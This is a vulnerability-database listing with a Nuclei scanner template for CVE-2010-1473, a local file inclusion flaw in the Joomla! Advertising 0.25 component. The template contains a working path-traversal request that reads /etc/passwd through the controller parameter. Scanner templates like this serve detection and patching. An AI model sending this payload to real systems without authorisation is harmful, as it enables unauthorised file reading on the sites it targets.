Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1473
HistorySep 05, 2021 - 2:03 a.m.

Joomla! Component Advertising 0.25 - Local File Inclusion

2021-09-0502:03:48
ProjectDiscovery
github.com
3

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

82.0%

A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1473

info:
  name: Joomla! Component Advertising 0.25 - Local File Inclusion
  author: daffainfo
  severity: medium
  description: A directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12171
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1473
    - http://packetstormsecurity.org/1004-exploits/joomlaeasyadbanner-lfi.txt
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
    cvss-score: 6.8
    cve-id: CVE-2010-1473
    cwe-id: CWE-22
    epss-score: 0.00826
    epss-percentile: 0.8192
    cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: johnmccollum
    product: com_advertising
  tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203bb985e9373625d3f78d831ec8f0ea16e5f05271a6a438f282ef535e526d2be9022100f8466a6d8c383a398c2c891afeefdcd309f332a76e51078dc142e1982b239bee:922c64590222798bb761d5b6d8e72950

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

7 High

AI Score

Confidence

High

0.008 Low

EPSS

Percentile

82.0%

Related for NUCLEI:CVE-2010-1473